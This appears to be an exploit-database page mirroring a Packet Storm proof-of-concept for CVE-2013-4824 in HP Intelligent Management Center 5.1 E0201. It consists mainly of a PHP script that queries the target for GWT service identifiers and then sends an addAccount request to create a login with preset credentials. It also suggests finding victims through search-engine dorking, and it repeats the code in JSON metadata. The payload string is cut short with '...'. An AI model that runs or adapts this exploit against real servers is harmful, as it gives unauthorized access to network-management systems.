📄 HP Intelligent Management 5.1 E0201 Account Creation_PACKETSTORM:212158

7.5 / 10

HIGH

AV:N/AC:L/Au:N/C:P/I:P/A:P

Description

Proof of concept for an old bypass vulnerability in HP Intelligent Management version 5.1 E0201 that allows for account creation...

Visit Original Source

Basic Information

ID PACKETSTORM:212158

Published Nov 27, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Create a new account in HP Intelligent Management Center .

(Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) .

[+] save code as poc.php.

[+] Set taget : Line 19.

[+] USage : php poc.php

[+] PayLoad :

<?php

function sendRequest($url, $data, $headers = [])
{
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response = curl_exec($ch);
curl_close($ch);

return $response;
}

$target = "http://victim-ip:8080"; // عدّل عنوان الهدف
$username = "msf";
$password = "p4ssw0rd";

// الخطوة 1: الحصول على strong name للخدمة
$response = sendRequest("$target/servicedesk/servicedesk/servicedesk.nocache.js", "", ["User-Agent: Mozilla/5.0"]);
preg_match("/unflattenKeylistIntoAnswers$\['default', 'safari'\], '([0-9A-Fa-f]+)'$;/", $response, $matches);
$serviceDesk = $matches[1] ?? null;

if (!$serviceDesk) {
die("فشل في العثور على service desk strong name\n");
}

echo "Service Desk Strong Name: $serviceDesk\n";

// الخطوة 2: الحصول على strong name لخدمة الحسابات
$response = sendRequest("$target/servicedesk/servicedesk/{$serviceDesk}.cache.html", "", ["User-Agent: Mozilla/5.0"]);
preg_match("/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/", $response, $matches);
$accountService = $matches[1] ?? null;

if (!$accountService) {
die("فشل في العثور على AccountService strong name\n");
}

echo "AccountService Strong Name: $accountService\n";

// الخطوة 3: إرسال الطلب لإنشاء الحساب
$payload = "6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...";
$data = [
'method' => 'POST',
'uri' => '/servicedesk/servicedesk/accountSerivce.gwtsvc',
'ctype' => 'text/x-gwt-rpc; charset=UTF-8',
'headers' => [
"X-GWT-Module-Base: $target/servicedesk/servicedesk/",
"X-GWT-Permutation: $serviceDesk"
],
'data' => $payload
];

$response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [
"Content-Type: text/x-gwt-rpc; charset=UTF-8",
"X-GWT-Module-Base: $target/servicedesk/servicedesk/",
"X-GWT-Permutation: $serviceDesk"
]);

if (strpos($response, "already exists") !== false) {
echo "المستخدم $username موجود بالفعل.\n";
} elseif (strpos($response, "added successfully") !== false) {
echo "تم إنشاء الحساب بنجاح: $username / $password\n";
echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n";
} else {
echo "فشل في إنشاء الحساب.\n";
}

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-27T18:33:28",
    "description": "Proof of concept for an old bypass vulnerability in HP Intelligent Management version 5.1 E0201 that allows for account creation...",
    "published": "2025-11-27T00:00:00",
    "modified": "2025-11-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 HP Intelligent Management 5.1 E0201 Account Creation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212158",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2013-4824"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48             |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: Create a new account in HP Intelligent Management Center .\n       \n       (Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set taget : Line 19.\n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    \n    <?php\n    \n    function sendRequest($url, $data, $headers = [])\n    {\n        $ch = curl_init();\n    \n        curl_setopt($ch, CURLOPT_URL, $url);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_POST, true);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n    \n        $response = curl_exec($ch);\n        curl_close($ch);\n    \n        return $response;\n    }\n    \n    $target = \"http://victim-ip:8080\"; // \u0639\u062f\u0651\u0644 \u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0647\u062f\u0641\n    $username = \"msf\";\n    $password = \"p4ssw0rd\";\n    \n    // \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 strong name \u0644\u0644\u062e\u062f\u0645\u0629\n    $response = sendRequest(\"$target/servicedesk/servicedesk/servicedesk.nocache.js\", \"\", [\"User-Agent: Mozilla/5.0\"]);\n    preg_match(\"/unflattenKeylistIntoAnswers\\(\\['default', 'safari'\\], '([0-9A-Fa-f]+)'\\);/\", $response, $matches);\n    $serviceDesk = $matches[1] ?? null;\n    \n    if (!$serviceDesk) {\n        die(\"\u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 service desk strong name\\n\");\n    }\n    \n    echo \"Service Desk Strong Name: $serviceDesk\\n\";\n    \n    // \u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 strong name \u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u062d\u0633\u0627\u0628\u0627\u062a\n    $response = sendRequest(\"$target/servicedesk/servicedesk/{$serviceDesk}.cache.html\", \"\", [\"User-Agent: Mozilla/5.0\"]);\n    preg_match(\"/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/\", $response, $matches);\n    $accountService = $matches[1] ?? null;\n    \n    if (!$accountService) {\n        die(\"\u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 AccountService strong name\\n\");\n    }\n    \n    echo \"AccountService Strong Name: $accountService\\n\";\n    \n    // \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628 \u0644\u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u062d\u0633\u0627\u0628\n    $payload = \"6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...\";\n    $data = [\n        'method' => 'POST',\n        'uri'    => '/servicedesk/servicedesk/accountSerivce.gwtsvc',\n        'ctype'  => 'text/x-gwt-rpc; charset=UTF-8',\n        'headers' => [\n            \"X-GWT-Module-Base: $target/servicedesk/servicedesk/\",\n            \"X-GWT-Permutation: $serviceDesk\"\n        ],\n        'data' => $payload\n    ];\n    \n    $response = sendRequest(\"$target/servicedesk/servicedesk/accountSerivce.gwtsvc\", $payload, [\n        \"Content-Type: text/x-gwt-rpc; charset=UTF-8\",\n        \"X-GWT-Module-Base: $target/servicedesk/servicedesk/\",\n        \"X-GWT-Permutation: $serviceDesk\"\n    ]);\n    \n    if (strpos($response, \"already exists\") !== false) {\n        echo \"\u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 $username \u0645\u0648\u062c\u0648\u062f \u0628\u0627\u0644\u0641\u0639\u0644.\\n\";\n    } elseif (strpos($response, \"added successfully\") !== false) {\n        echo \"\u062a\u0645 \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u062d\u0633\u0627\u0628 \u0628\u0646\u062c\u0627\u062d: $username / $password\\n\";\n        echo \"\u0642\u0645 \u0628\u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644 \u0645\u0646: $target/servicedesk/ServiceDesk.jsp\\n\";\n    } else {\n        echo \"\u0641\u0634\u0644 \u0641\u064a \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u062d\u0633\u0627\u0628.\\n\";\n    }\n    \n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212158",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212158/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply